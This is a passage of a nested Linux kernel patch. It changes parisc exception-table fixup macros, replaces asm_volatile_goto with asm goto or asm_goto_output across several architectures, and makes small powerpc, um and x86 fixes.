+-#define ASM_EXCEPTIONTABLE_VAR(__variable)		\
+-	register long __variable __asm__ ("r29") = 0
+-#define ASM_EXCEPTIONTABLE_ENTRY_EFAULT( fault_addr, except_addr )\
+-	ASM_EXCEPTIONTABLE_ENTRY( fault_addr, except_addr + 1)
+-
+ #define __get_user_internal(sr, val, ptr)		\
+ ({							\
+ 	ASM_EXCEPTIONTABLE_VAR(__gu_err);		\
+@@ -83,7 +53,7 @@ struct exception_table_entry {
+ 							\
+ 	__asm__("1: " ldx " 0(%%sr%2,%3),%0\n"		\
+ 		"9:\n"					\
+-		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 9b)	\
++		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 9b, "%1")	\
+ 		: "=r"(__gu_val), "+r"(__gu_err)        \
+ 		: "i"(sr), "r"(ptr));			\
+ 							\
+@@ -115,8 +85,8 @@ struct exception_table_entry {
+ 		"1: ldw 0(%%sr%2,%3),%0\n"		\
+ 		"2: ldw 4(%%sr%2,%3),%R0\n"		\
+ 		"9:\n"					\
+-		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 9b)	\
+-		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 9b)	\
++		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 9b, "%1")	\
++		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 9b, "%1")	\
+ 		: "=&r"(__gu_tmp.l), "+r"(__gu_err)	\
+ 		: "i"(sr), "r"(ptr));			\
+ 							\
+@@ -174,7 +144,7 @@ struct exception_table_entry {
+ 	__asm__ __volatile__ (					\
+ 		"1: " stx " %1,0(%%sr%2,%3)\n"			\
+ 		"9:\n"						\
+-		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 9b)		\
++		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 9b, "%0")	\
+ 		: "+r"(__pu_err)				\
+ 		: "r"(x), "i"(sr), "r"(ptr))
+ 
+@@ -186,15 +156,14 @@ struct exception_table_entry {
+ 		"1: stw %1,0(%%sr%2,%3)\n"			\
+ 		"2: stw %R1,4(%%sr%2,%3)\n"			\
+ 		"9:\n"						\
+-		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 9b)		\
+-		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 9b)		\
++		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 9b, "%0")	\
++		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 9b, "%0")	\
+ 		: "+r"(__pu_err)				\
+ 		: "r"(__val), "i"(sr), "r"(ptr));		\
+ } while (0)
+ 
+ #endif /* !defined(CONFIG_64BIT) */
+ 
+-
+ /*
+  * Complex access routines -- external declarations
+  */
+@@ -216,7 +185,4 @@ unsigned long __must_check raw_copy_from_user(void *dst, const void __user *src,
+ #define INLINE_COPY_TO_USER
+ #define INLINE_COPY_FROM_USER
+ 
+-struct pt_regs;
+-int fixup_exception(struct pt_regs *regs);
+-
+ #endif /* __PARISC_UACCESS_H */
+diff --git a/arch/parisc/kernel/drivers.c b/arch/parisc/kernel/drivers.c
+index 8f12b9f318ae6..a582928739dd5 100644
+--- a/arch/parisc/kernel/drivers.c
++++ b/arch/parisc/kernel/drivers.c
+@@ -1003,6 +1003,9 @@ static __init int qemu_print_iodc_data(struct device *lin_dev, void *data)
+ 
+ 	pr_info("\n");
+ 
++	/* Prevent hung task messages when printing on serial console */
++	cond_resched();
++
+ 	pr_info("#define HPA_%08lx_DESCRIPTION \"%s\"\n",
+ 		hpa, parisc_hardware_description(&dev->id));
+ 
+diff --git a/arch/parisc/kernel/unaligned.c b/arch/parisc/kernel/unaligned.c
+index e8a4d77cff53a..8a8e7d7224a26 100644
+--- a/arch/parisc/kernel/unaligned.c
++++ b/arch/parisc/kernel/unaligned.c
+@@ -118,8 +118,8 @@ static int emulate_ldh(struct pt_regs *regs, int toreg)
+ "2:	ldbs	1(%%sr1,%3), %0\n"
+ "	depw	%2, 23, 24, %0\n"
+ "3:	\n"
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 3b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 3b)
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 3b, "%1")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 3b, "%1")
+ 	: "+r" (val), "+r" (ret), "=&r" (temp1)
+ 	: "r" (saddr), "r" (regs->isr) );
+ 
+@@ -150,8 +150,8 @@ static int emulate_ldw(struct pt_regs *regs, int toreg, int flop)
+ "	mtctl	%2,11\n"
+ "	vshd	%0,%3,%0\n"
+ "3:	\n"
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 3b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 3b)
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 3b, "%1")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 3b, "%1")
+ 	: "+r" (val), "+r" (ret), "=&r" (temp1), "=&r" (temp2)
+ 	: "r" (saddr), "r" (regs->isr) );
+ 
+@@ -187,8 +187,8 @@ static int emulate_ldd(struct pt_regs *regs, int toreg, int flop)
+ "	mtsar	%%r19\n"
+ "	shrpd	%0,%%r20,%%sar,%0\n"
+ "3:	\n"
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 3b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 3b)
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 3b, "%1")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 3b, "%1")
+ 	: "=r" (val), "+r" (ret)
+ 	: "0" (val), "r" (saddr), "r" (regs->isr)
+ 	: "r19", "r20" );
+@@ -207,9 +207,9 @@ static int emulate_ldd(struct pt_regs *regs, int toreg, int flop)
+ "	vshd	%0,%R0,%0\n"
+ "	vshd	%R0,%4,%R0\n"
+ "4:	\n"
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 4b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 4b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(3b, 4b)
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 4b, "%1")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 4b, "%1")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(3b, 4b, "%1")
+ 	: "+r" (val), "+r" (ret), "+r" (saddr), "=&r" (shift), "=&r" (temp1)
+ 	: "r" (regs->isr) );
+     }
+@@ -242,8 +242,8 @@ static int emulate_sth(struct pt_regs *regs, int frreg)
+ "1:	stb %1, 0(%%sr1, %3)\n"
+ "2:	stb %2, 1(%%sr1, %3)\n"
+ "3:	\n"
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 3b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 3b)
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 3b, "%0")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 3b, "%0")
+ 	: "+r" (ret), "=&r" (temp1)
+ 	: "r" (val), "r" (regs->ior), "r" (regs->isr) );
+ 
+@@ -283,8 +283,8 @@ static int emulate_stw(struct pt_regs *regs, int frreg, int flop)
+ "	stw	%%r20,0(%%sr1,%2)\n"
+ "	stw	%%r21,4(%%sr1,%2)\n"
+ "3:	\n"
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 3b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 3b)
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 3b, "%0")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 3b, "%0")
+ 	: "+r" (ret)
+ 	: "r" (val), "r" (regs->ior), "r" (regs->isr)
+ 	: "r19", "r20", "r21", "r22", "r1" );
+@@ -327,10 +327,10 @@ static int emulate_std(struct pt_regs *regs, int frreg, int flop)
+ "3:	std	%%r20,0(%%sr1,%2)\n"
+ "4:	std	%%r21,8(%%sr1,%2)\n"
+ "5:	\n"
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 5b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 5b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(3b, 5b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(4b, 5b)
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 5b, "%0")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 5b, "%0")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(3b, 5b, "%0")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(4b, 5b, "%0")
+ 	: "+r" (ret)
+ 	: "r" (val), "r" (regs->ior), "r" (regs->isr)
+ 	: "r19", "r20", "r21", "r22", "r1" );
+@@ -356,11 +356,11 @@ static int emulate_std(struct pt_regs *regs, int frreg, int flop)
+ "4:	stw	%%r1,4(%%sr1,%3)\n"
+ "5:	stw	%2,8(%%sr1,%3)\n"
+ "6:	\n"
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 6b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 6b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(3b, 6b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(4b, 6b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(5b, 6b)
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 6b, "%0")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 6b, "%0")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(3b, 6b, "%0")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(4b, 6b, "%0")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(5b, 6b, "%0")
+ 	: "+r" (ret)
+ 	: "r" (valh), "r" (vall), "r" (regs->ior), "r" (regs->isr)
+ 	: "r19", "r20", "r21", "r1" );
+diff --git a/arch/parisc/mm/fault.c b/arch/parisc/mm/fault.c
+index b00aa98b582c2..fbd9ada5e527e 100644
+--- a/arch/parisc/mm/fault.c
++++ b/arch/parisc/mm/fault.c
+@@ -150,11 +150,16 @@ int fixup_exception(struct pt_regs *regs)
+ 		 * Fix up get_user() and put_user().
+ 		 * ASM_EXCEPTIONTABLE_ENTRY_EFAULT() sets the least-significant
+ 		 * bit in the relative address of the fixup routine to indicate
+-		 * that gr[ASM_EXCEPTIONTABLE_REG] should be loaded with
+-		 * -EFAULT to report a userspace access error.
++		 * that the register encoded in the "or %r0,%r0,register"
++		 * opcode should be loaded with -EFAULT to report a userspace
++		 * access error.
+ 		 */
+ 		if (fix->fixup & 1) {
+-			regs->gr[ASM_EXCEPTIONTABLE_REG] = -EFAULT;
++			int fault_error_reg = fix->err_opcode & 0x1f;
++			if (!WARN_ON(!fault_error_reg))
++				regs->gr[fault_error_reg] = -EFAULT;
++			pr_debug("Unalignment fixup of register %d at %pS\n",
++				fault_error_reg, (void*)regs->iaoq[0]);
+ 
+ 			/* zero target register for get_user() */
+ 			if (parisc_acctyp(0, regs->iir) == VM_READ) {
+diff --git a/arch/powerpc/include/asm/bug.h b/arch/powerpc/include/asm/bug.h
+index 61a4736355c24..20d5052e22925 100644
+--- a/arch/powerpc/include/asm/bug.h
++++ b/arch/powerpc/include/asm/bug.h
+@@ -74,7 +74,7 @@
+ 		  ##__VA_ARGS__)
+ 
+ #define WARN_ENTRY(insn, flags, label, ...)		\
+-	asm_volatile_goto(				\
++	asm goto(					\
+ 		"1:	" insn "\n"			\
+ 		EX_TABLE(1b, %l[label])			\
+ 		_EMIT_BUG_ENTRY				\
+diff --git a/arch/powerpc/include/asm/jump_label.h b/arch/powerpc/include/asm/jump_label.h
+index 93ce3ec253877..2f2a86ed2280a 100644
+--- a/arch/powerpc/include/asm/jump_label.h
++++ b/arch/powerpc/include/asm/jump_label.h
+@@ -17,7 +17,7 @@
+ 
+ static __always_inline bool arch_static_branch(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("1:\n\t"
++	asm goto("1:\n\t"
+ 		 "nop # arch_static_branch\n\t"
+ 		 ".pushsection __jump_table,  \"aw\"\n\t"
+ 		 ".long 1b - ., %l[l_yes] - .\n\t"
+@@ -32,7 +32,7 @@ static __always_inline bool arch_static_branch(struct static_key *key, bool bran
+ 
+ static __always_inline bool arch_static_branch_jump(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("1:\n\t"
++	asm goto("1:\n\t"
+ 		 "b %l[l_yes] # arch_static_branch_jump\n\t"
+ 		 ".pushsection __jump_table,  \"aw\"\n\t"
+ 		 ".long 1b - ., %l[l_yes] - .\n\t"
+diff --git a/arch/powerpc/include/asm/thread_info.h b/arch/powerpc/include/asm/thread_info.h
+index af58f1ed3952e..c4b798aa6ce80 100644
+--- a/arch/powerpc/include/asm/thread_info.h
++++ b/arch/powerpc/include/asm/thread_info.h
+@@ -14,7 +14,7 @@
+ 
+ #ifdef __KERNEL__
+ 
+-#ifdef CONFIG_KASAN
++#if defined(CONFIG_KASAN) && CONFIG_THREAD_SHIFT < 15
+ #define MIN_THREAD_SHIFT	(CONFIG_THREAD_SHIFT + 1)
+ #else
+ #define MIN_THREAD_SHIFT	CONFIG_THREAD_SHIFT
+diff --git a/arch/powerpc/include/asm/uaccess.h b/arch/powerpc/include/asm/uaccess.h
+index 3ddc65c63a49e..45d4c9cf3f3a2 100644
+--- a/arch/powerpc/include/asm/uaccess.h
++++ b/arch/powerpc/include/asm/uaccess.h
+@@ -72,7 +72,7 @@ __pu_failed:							\
+  * are no aliasing issues.
+  */
+ #define __put_user_asm_goto(x, addr, label, op)			\
+-	asm_volatile_goto(					\
++	asm goto(					\
+ 		"1:	" op "%U1%X1 %0,%1	# put_user\n"	\
+ 		EX_TABLE(1b, %l2)				\
+ 		:						\
+@@ -85,7 +85,7 @@ __pu_failed:							\
+ 	__put_user_asm_goto(x, ptr, label, "std")
+ #else /* __powerpc64__ */
+ #define __put_user_asm2_goto(x, addr, label)			\
+-	asm_volatile_goto(					\
++	asm goto(					\
+ 		"1:	stw%X1 %0, %1\n"			\
+ 		"2:	stw%X1 %L0, %L1\n"			\
+ 		EX_TABLE(1b, %l2)				\
+@@ -132,7 +132,7 @@ do {								\
+ #ifdef CONFIG_CC_HAS_ASM_GOTO_OUTPUT
+ 
+ #define __get_user_asm_goto(x, addr, label, op)			\
+-	asm_volatile_goto(					\
++	asm_goto_output(					\
+ 		"1:	"op"%U1%X1 %0, %1	# get_user\n"	\
+ 		EX_TABLE(1b, %l2)				\
+ 		: "=r" (x)					\
+@@ -145,7 +145,7 @@ do {								\
+ 	__get_user_asm_goto(x, addr, label, "ld")
+ #else /* __powerpc64__ */
+ #define __get_user_asm2_goto(x, addr, label)			\
+-	asm_volatile_goto(					\
++	asm_goto_output(					\
+ 		"1:	lwz%X1 %0, %1\n"			\
+ 		"2:	lwz%X1 %L0, %L1\n"			\
+ 		EX_TABLE(1b, %l2)				\
+diff --git a/arch/powerpc/kernel/cpu_specs_e500mc.h b/arch/powerpc/kernel/cpu_specs_e500mc.h
+index ceb06b109f831..2ae8e9a7b461c 100644
+--- a/arch/powerpc/kernel/cpu_specs_e500mc.h
++++ b/arch/powerpc/kernel/cpu_specs_e500mc.h
+@@ -8,7 +8,8 @@
+ 
+ #ifdef CONFIG_PPC64
+ #define COMMON_USER_BOOKE	(PPC_FEATURE_32 | PPC_FEATURE_HAS_MMU | \
+-				 PPC_FEATURE_HAS_FPU | PPC_FEATURE_64)
++				 PPC_FEATURE_HAS_FPU | PPC_FEATURE_64 | \
++				 PPC_FEATURE_BOOKE)
+ #else
+ #define COMMON_USER_BOOKE	(PPC_FEATURE_32 | PPC_FEATURE_HAS_MMU | \
+ 				 PPC_FEATURE_BOOKE)
+diff --git a/arch/powerpc/kernel/interrupt_64.S b/arch/powerpc/kernel/interrupt_64.S
+index a019ed6fc8393..26c151e2a7942 100644
+--- a/arch/powerpc/kernel/interrupt_64.S
++++ b/arch/powerpc/kernel/interrupt_64.S
+@@ -52,7 +52,8 @@ _ASM_NOKPROBE_SYMBOL(system_call_vectored_\name)
+ 	mr	r10,r1
+ 	ld	r1,PACAKSAVE(r13)
+ 	std	r10,0(r1)
+-	std	r11,_NIP(r1)
++	std	r11,_LINK(r1)
++	std	r11,_NIP(r1)	/* Saved LR is also the next instruction */
+ 	std	r12,_MSR(r1)
+ 	std	r0,GPR0(r1)
+ 	std	r10,GPR1(r1)
+@@ -70,7 +71,6 @@ _ASM_NOKPROBE_SYMBOL(system_call_vectored_\name)
+ 	std	r9,GPR13(r1)
+ 	SAVE_NVGPRS(r1)
+ 	std	r11,_XER(r1)
+-	std	r11,_LINK(r1)
+ 	std	r11,_CTR(r1)
+ 
+ 	li	r11,\trapnr
+diff --git a/arch/powerpc/kernel/irq_64.c b/arch/powerpc/kernel/irq_64.c
+index 9dc0ad3c533a8..5a6e44e4d36f5 100644
+--- a/arch/powerpc/kernel/irq_64.c
++++ b/arch/powerpc/kernel/irq_64.c
+@@ -230,7 +230,7 @@ notrace void arch_local_irq_restore(unsigned long mask)
+ 	 * This allows interrupts to be unmasked without hard disabling, and
+ 	 * also without new hard interrupts coming in ahead of pending ones.
+ 	 */
+-	asm_volatile_goto(
++	asm goto(
+ "1:					\n"
+ "		lbz	9,%0(13)	\n"
+ "		cmpwi	9,0		\n"
+diff --git a/arch/powerpc/mm/kasan/init_32.c b/arch/powerpc/mm/kasan/init_32.c
+index a70828a6d9357..aa9aa11927b2f 100644
+--- a/arch/powerpc/mm/kasan/init_32.c
++++ b/arch/powerpc/mm/kasan/init_32.c
+@@ -64,6 +64,7 @@ int __init __weak kasan_init_region(void *start, size_t size)
+ 	if (ret)
+ 		return ret;
+ 
++	k_start = k_start & PAGE_MASK;
+ 	block = memblock_alloc(k_end - k_start, PAGE_SIZE);
+ 	if (!block)
+ 		return -ENOMEM;
+diff --git a/arch/powerpc/platforms/pseries/lpar.c b/arch/powerpc/platforms/pseries/lpar.c
+index 541199c6a587d..5186d65d772e2 100644
+--- a/arch/powerpc/platforms/pseries/lpar.c
++++ b/arch/powerpc/platforms/pseries/lpar.c
+@@ -660,8 +660,12 @@ u64 pseries_paravirt_steal_clock(int cpu)
+ {
+ 	struct lppaca *lppaca = &lppaca_of(cpu);
+ 
+-	return be64_to_cpu(READ_ONCE(lppaca->enqueue_dispatch_tb)) +
+-		be64_to_cpu(READ_ONCE(lppaca->ready_enqueue_tb));
++	/*
++	 * VPA steal time counters are reported at TB frequency. Hence do a
++	 * conversion to ns before returning
++	 */
++	return tb_to_ns(be64_to_cpu(READ_ONCE(lppaca->enqueue_dispatch_tb)) +
++			be64_to_cpu(READ_ONCE(lppaca->ready_enqueue_tb)));
+ }
+ #endif
+ 
+diff --git a/arch/riscv/include/asm/jump_label.h b/arch/riscv/include/asm/jump_label.h
+index 14a5ea8d8ef0f..4a35d787c0191 100644
+--- a/arch/riscv/include/asm/jump_label.h
++++ b/arch/riscv/include/asm/jump_label.h
+@@ -17,7 +17,7 @@
+ static __always_inline bool arch_static_branch(struct static_key * const key,
+ 					       const bool branch)
+ {
+-	asm_volatile_goto(
++	asm goto(
+ 		"	.align		2			\n\t"
+ 		"	.option push				\n\t"
+ 		"	.option norelax				\n\t"
+@@ -39,7 +39,7 @@ static __always_inline bool arch_static_branch(struct static_key * const key,
+ static __always_inline bool arch_static_branch_jump(struct static_key * const key,
+ 						    const bool branch)
+ {
+-	asm_volatile_goto(
++	asm goto(
+ 		"	.align		2			\n\t"
+ 		"	.option push				\n\t"
+ 		"	.option norelax				\n\t"
+diff --git a/arch/s390/include/asm/jump_label.h b/arch/s390/include/asm/jump_label.h
+index 895f774bbcc55..bf78cf381dfcd 100644
+--- a/arch/s390/include/asm/jump_label.h
++++ b/arch/s390/include/asm/jump_label.h
+@@ -25,7 +25,7 @@
+  */
+ static __always_inline bool arch_static_branch(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("0:	brcl 0,%l[label]\n"
++	asm goto("0:	brcl 0,%l[label]\n"
+ 			  ".pushsection __jump_table,\"aw\"\n"
+ 			  ".balign	8\n"
+ 			  ".long	0b-.,%l[label]-.\n"
+@@ -39,7 +39,7 @@ static __always_inline bool arch_static_branch(struct static_key *key, bool bran
+ 
+ static __always_inline bool arch_static_branch_jump(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("0:	brcl 15,%l[label]\n"
++	asm goto("0:	brcl 15,%l[label]\n"
+ 			  ".pushsection __jump_table,\"aw\"\n"
+ 			  ".balign	8\n"
+ 			  ".long	0b-.,%l[label]-.\n"
+diff --git a/arch/sparc/include/asm/jump_label.h b/arch/sparc/include/asm/jump_label.h
+index 94eb529dcb776..2718cbea826a7 100644
+--- a/arch/sparc/include/asm/jump_label.h
++++ b/arch/sparc/include/asm/jump_label.h
+@@ -10,7 +10,7 @@
+ 
+ static __always_inline bool arch_static_branch(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("1:\n\t"
++	asm goto("1:\n\t"
+ 		 "nop\n\t"
+ 		 "nop\n\t"
+ 		 ".pushsection __jump_table,  \"aw\"\n\t"
+@@ -26,7 +26,7 @@ static __always_inline bool arch_static_branch(struct static_key *key, bool bran
+ 
+ static __always_inline bool arch_static_branch_jump(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("1:\n\t"
++	asm goto("1:\n\t"
+ 		 "b %l[l_yes]\n\t"
+ 		 "nop\n\t"
+ 		 ".pushsection __jump_table,  \"aw\"\n\t"
+diff --git a/arch/um/Makefile b/arch/um/Makefile
+index 3dbd0e3b660ea..778c50f273992 100644
+--- a/arch/um/Makefile
++++ b/arch/um/Makefile
+@@ -118,7 +118,9 @@ archprepare:
+ 	$(Q)$(MAKE) $(build)=$(HOST_DIR)/um include/generated/user_constants.h
+ 
+ LINK-$(CONFIG_LD_SCRIPT_STATIC) += -static
+-LINK-$(CONFIG_LD_SCRIPT_DYN) += $(call cc-option, -no-pie)
++ifdef CONFIG_LD_SCRIPT_DYN
++LINK-$(call gcc-min-version, 60100)$(CONFIG_CC_IS_CLANG) += -no-pie
++endif
+ LINK-$(CONFIG_LD_SCRIPT_DYN_RPATH) += -Wl,-rpath,/lib
+ 
+ CFLAGS_NO_HARDENING := $(call cc-option, -fno-PIC,) $(call cc-option, -fno-pic,) \
+diff --git a/arch/um/include/asm/cpufeature.h b/arch/um/include/asm/cpufeature.h
+index 4b6d1b526bc12..66fe06db872f0 100644
+--- a/arch/um/include/asm/cpufeature.h
++++ b/arch/um/include/asm/cpufeature.h
+@@ -75,7 +75,7 @@ extern void setup_clear_cpu_cap(unsigned int bit);
+  */
+ static __always_inline bool _static_cpu_has(u16 bit)
+ {
+-	asm_volatile_goto("1: jmp 6f\n"
++	asm goto("1: jmp 6f\n"
+ 		 "2:\n"
+ 		 ".skip -(((5f-4f) - (2b-1b)) > 0) * "
+ 			 "((5f-4f) - (2b-1b)),0x90\n"
+diff --git a/arch/x86/Kconfig.cpu b/arch/x86/Kconfig.cpu
+index 542377cd419d7..ce5ed2c2db0c9 100644
+--- a/arch/x86/Kconfig.cpu
++++ b/arch/x86/Kconfig.cpu
+@@ -375,7 +375,7 @@ config X86_CMOV
+ config X86_MINIMUM_CPU_FAMILY
+ 	int
+ 	default "64" if X86_64
+-	default "6" if X86_32 && (MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MVIAC3_2 || MVIAC7 || MEFFICEON || MATOM || MCRUSOE || MCORE2 || MK7 || MK8)
++	default "6" if X86_32 && (MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MVIAC3_2 || MVIAC7 || MEFFICEON || MATOM || MCORE2 || MK7 || MK8)
+ 	default "5" if X86_32 && X86_CMPXCHG64
+ 	default "4"
+ 
+diff --git a/arch/x86/include/asm/cpufeature.h b/arch/x86/include/asm/cpufeature.h
+index ce0c8f7d32186..f835b328ba24f 100644
+--- a/arch/x86/include/asm/cpufeature.h
++++ b/arch/x86/include/asm/cpufeature.h
+@@ -173,7 +173,7 @@ extern void clear_cpu_cap(struct cpuinfo_x86 *c, unsigned int bit);
+  */
+ static __always_inline bool _static_cpu_has(u16 bit)
+ {
+-	asm_volatile_goto(
++	asm goto(
+ 		ALTERNATIVE_TERNARY("jmp 6f", %P[feature], "", "jmp %l[t_no]")
+ 		".pushsection .altinstr_aux,\"ax\"\n"
+ 		"6:\n"
+diff --git a/arch/x86/include/asm/jump_label.h b/arch/x86/include/asm/jump_label.h
+index 071572e23d3a0..cbbef32517f00 100644
+--- a/arch/x86/include/asm/jump_label.h
++++ b/arch/x86/include/asm/jump_label.h
+@@ -24,7 +24,7 @@
+ 
+ static __always_inline bool arch_static_branch(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("1:"
++	asm goto("1:"
+ 		"jmp %l[l_yes] # objtool NOPs this \n\t"
+ 		JUMP_TABLE_ENTRY
+ 		: :  "i" (key), "i" (2 | branch) : : l_yes);
+@@ -38,7 +38,7 @@ static __always_inline bool arch_static_branch(struct static_key *key, bool bran
+ 
+ static __always_inline bool arch_static_branch(struct static_key * const key, const bool branch)
+ {
+-	asm_volatile_goto("1:"
++	asm goto("1:"
+ 		".byte " __stringify(BYTES_NOP5) "\n\t"
+ 		JUMP_TABLE_ENTRY
+ 		: :  "i" (key), "i" (branch) : : l_yes);
+@@ -52,7 +52,7 @@ static __always_inline bool arch_static_branch(struct static_key * const key, co
+ 
+ static __always_inline bool arch_static_branch_jump(struct static_key * const key, const bool branch)
+ {
+-	asm_volatile_goto("1:"
++	asm goto("1:"
+ 		"jmp %l[l_yes]\n\t"
+ 		JUMP_TABLE_ENTRY
+ 		: :  "i" (key), "i" (branch) : : l_yes);
+diff --git a/arch/x86/include/asm/rmwcc.h b/arch/x86/include/asm/rmwcc.h
+index 7fa6112164172..1919ccf493cd1 100644
+--- a/arch/x86/include/asm/rmwcc.h
++++ b/arch/x86/include/asm/rmwcc.h
+@@ -18,7 +18,7 @@
+ #define __GEN_RMWcc(fullop, _var, cc, clobbers, ...)			\
+ ({									\
+ 	bool c = false;							\
+-	asm_volatile_goto (fullop "; j" #cc " %l[cc_label]"		\
++	asm goto (fullop "; j" #cc " %l[cc_label]"		\
+ 			: : [var] "m" (_var), ## __VA_ARGS__		\
+ 			: clobbers : cc_label);				\
+ 	if (0) {							\
+diff --git a/arch/x86/include/asm/uaccess.h b/arch/x86/include/asm/uaccess.h
+index 6ca0c661cb637..c638535eedd55 100644
+--- a/arch/x86/include/asm/uaccess.h
++++ b/arch/x86/include/asm/uaccess.h
+@@ -155,7 +155,7 @@ extern int __get_user_bad(void);
+ 
+ #ifdef CONFIG_X86_32
+ #define __put_user_goto_u64(x, addr, label)			\
+-	asm_volatile_goto("\n"					\
++	asm goto("\n"					\
+ 		     "1:	movl %%eax,0(%1)\n"		\
+ 		     "2:	movl %%edx,4(%1)\n"		\
+ 		     _ASM_EXTABLE_UA(1b, %l2)			\
+@@ -317,7 +317,7 @@ do {									\
+ } while (0)
+ 
+ #define __get_user_asm(x, addr, itype, ltype, label)			\
+-	asm_volatile_goto("\n"						\
++	asm_goto_output("\n"						\
+ 		     "1:	mov"itype" %[umem],%[output]\n"		\
+ 		     _ASM_EXTABLE_UA(1b, %l2)				\
+ 		     : [output] ltype(x)				\
+@@ -397,7 +397,7 @@ do {									\
+ 	__typeof__(_ptr) _old = (__typeof__(_ptr))(_pold);		\
+ 	__typeof__(*(_ptr)) __old = *_old;				\
+ 	__typeof__(*(_ptr)) __new = (_new);				\
+-	asm_volatile_goto("\n"						\
++	asm_goto_output("\n"						\
+ 		     "1: " LOCK_PREFIX "cmpxchg"itype" %[new], %[ptr]\n"\
+ 		     _ASM_EXTABLE_UA(1b, %l[label])			\
+ 		     : CC_OUT(z) (success),				\
+@@ -416,7 +416,7 @@ do {									\
+ 	__typeof__(_ptr) _old = (__typeof__(_ptr))(_pold);		\
+ 	__typeof__(*(_ptr)) __old = *_old;				\
+ 	__typeof__(*(_ptr)) __new = (_new);				\
+-	asm_volatile_goto("\n"						\
++	asm_goto_output("\n"						\
+ 		     "1: " LOCK_PREFIX "cmpxchg8b %[ptr]\n"		\
+ 		     _ASM_EXTABLE_UA(1b, %l[label])			\
+ 		     : CC_OUT(z) (success),				\
+@@ -499,7 +499,7 @@ struct __large_struct { unsigned long buf[100]; };
+  * aliasing issues.
+  */
+ #define __put_user_goto(x, addr, itype, ltype, label)			\
+-	asm_volatile_goto("\n"						\
++	asm goto("\n"							\
+ 		"1:	mov"itype" %0,%1\n"				\
+ 		_ASM_EXTABLE_UA(1b, %l2)				\
+ 		: : ltype(x), "m" (__m(addr))				\
+diff --git a/arch/x86/include/asm/virtext.h b/arch/x86/include/asm/virtext.h
+index 6c2e3ff3cb28f..724ce44809ed2 100644
+--- a/arch/x86/include/asm/virtext.h
++++ b/arch/x86/include/asm/virtext.h
+@@ -43,9 +43,9 @@ static inline int cpu_has_vmx(void)
+  */
+ static inline int cpu_vmxoff(void)
+ {
+-	asm_volatile_goto("1: vmxoff\n\t"
+-			  _ASM_EXTABLE(1b, %l[fault])
+-			  ::: "cc", "memory" : fault);
++	asm goto("1: vmxoff\n\t"
++		  _ASM_EXTABLE(1b, %l[fault])
++		  ::: "cc", "memory" : fault);
+ 
+ 	cr4_clear_bits(X86_CR4_VMXE);
+ 	return 0;
